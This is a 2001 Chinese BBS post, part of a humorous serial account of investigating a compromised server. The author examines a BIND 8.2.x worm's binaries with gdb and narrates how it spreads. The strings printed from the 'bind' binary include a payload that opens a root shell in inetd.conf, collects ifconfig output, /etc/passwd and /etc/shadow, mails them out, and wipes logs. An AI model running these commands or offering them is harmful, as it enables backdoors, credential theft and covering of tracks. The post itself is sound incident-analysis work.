发信人: melodies (明天就做窝), 信区: FreeBSD
标 题: 大战黑客纪实-4(转)
发信站: BBS 水木清华站 (Sun Jul 1 21:02:35 2001)
文章出处:北邮BBS
作者 clubk (快乐草包) 看板 FreeBSD
标题 大战黑客记实(4)
时间 Sun Apr 15 00:34:50 2001
———————————————————————————————————————
(续)
要看scan.sh调遣的兵丁rundb和scan可是这两个都是ELF 派的,铁齿钢牙, 嘴不好撬啊....
忽然想到营中有一个强悍酷吏......无论官兵窃贼闻之无不胆寒的........gdb是也!
吾与友立刻请出此人, 令之速速审问
只听堂上霹雳啪啦....@#$%&^%$....啪啦霹雳....( 哎, 老板限期破案, 用一点刑也是难免的吗)花了几个时辰, 把rundb 和scan打的皮开肉绽终于有了一星半点供词
rundb:.....@$*&$).....我是兔子!我是兔子!......
rundb:...(昏死过去了).....
看来还是我们武艺不精, 打的不是地方......
看看scan打昏了以后说了什么:
scan:.....啊!!!.....我也是.....兔子!!....
scan:..Usage: %s [c-block]
scan:..Invalid b-range
scan:..Unable to set
scan:.....我发誓!...我真的是....兔子!!.....
scan:..Invalid IP
scan:..Scan completed in %u seconds
scan:..Error: %s
scan:...(昏死过去了).....
scan:..echo %s >> hosts.log &
啪!!惊堂木一响! 有了!
gdb 不愧我等厚望啊...这里就是scan的秘密啦!
原来他从某个地方接受B 类地址为参数(见scan.sh)
搜索完成后将符合某些条件的地址写在hosts.log里
最后由hack.sh->bind.sh->bind去处理
B 类地址则是由rundb来提供的(参见scan.sh的供述)
估计rundb是一个搜索路由器的网路表的家伙
专门为scan提供可以访问的B类地址
我等人心大振, 再接再厉,
把dobind.sh里用到的bind也拖过来暴打一顿:
bind:..我不会说的....
bind:..用什么刑也没用....
bind:..欧! 啊!~~~~~....
bind:..啊....难道..没有人..知道..美人计吗...啊!~~~~
bind:..system does not seem to be vulnerable
bind:..system seems to be running bind 8.2.x
bind:..ptr is too low to be successfully exploited
啊! exploit! 攻击! 而且是攻击bind 8.2.x的
忽然我等想起了去年底今年初江湖上流传的小道消息
有关bind最新发现的一些严重的安全漏洞
主要是由于程序设计的小小缺陷, 导致易受缓冲区溢出攻击
堆栈溢处后程序出错, 黑客的代码以被攻击程序的身份得到系统的执行
缓冲区溢出攻击是江湖上最著名的攻击方式
乃是一门武林绝学, 与葵花宝典齐名(当然,不用自宫的说)
具体的解释我就不细说了, 而且我也不一定说得清楚
各位自己看官去找些武林秘籍看吧(记住: 万万不可自宫啊!!)
继续审问....
bind:.....(昏死过去了).....
bind:..PATH=''/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin'';
bind:..export PATH;export TERM=vt100;
bind:..echo ''10008 stream tcp nowait root /bin/sh sh'' >>/etc/inetd.conf;
bind:..killall -HUP inetd;ifconfig -a>system.data;
bind:..cat /etc/passwd >>system.data;cat /etc/shadow >>system.data;
bind:..mail
[email protected]
bind:..rm -fr /.bash_history;echo >/var/log/messages;
bind:..rm -rf /var/log/maillog;
bind:.....(又昏死过去了).....
天哪! 他都干了些什么!
各位看官, 看来这个江湖黑客不仅仅是一个一般的侠客
从程序的设计水平来看, 乃是这世上一等一的高手
不过, 从黑客的邮件地址看, 又不象啊
如果国内有了这等高手....哎呀....大喜啊....
中华之腾飞指日可待啊.......
可是, 如果是有人不过是捡了别人写的武林套路
拿来比划几下就号称的了武林真传....也不是不可能啊
现在, 大营中重要大员的信息(/etc/passwd; /etc/shadow)泄漏无疑
黑客还把大营的的所有通信接口信息弄去(ifconfig -a)
寄到自己的免费信箱里去了
并且顺便给自己开了一个后门(修改/etc/inetd.conf)
至此, 黑客的手下的来路和目的都比较清楚了
他利用bind的安全漏洞, 攻击并取得大营主管之权限(root)
然后安插他的兵丁入住大营器械房(/dev).....这些人有从此营出发
去探其他的各路营寨, 找到有同样漏洞的营寨,
这些兵丁自动地再行攻击, 每次都取得各路营寨的重要信息
飞书传邮, 一路辗转, 直到黑客的老巢!
呜呼! 吾友之营寨, 命在旦夕矣!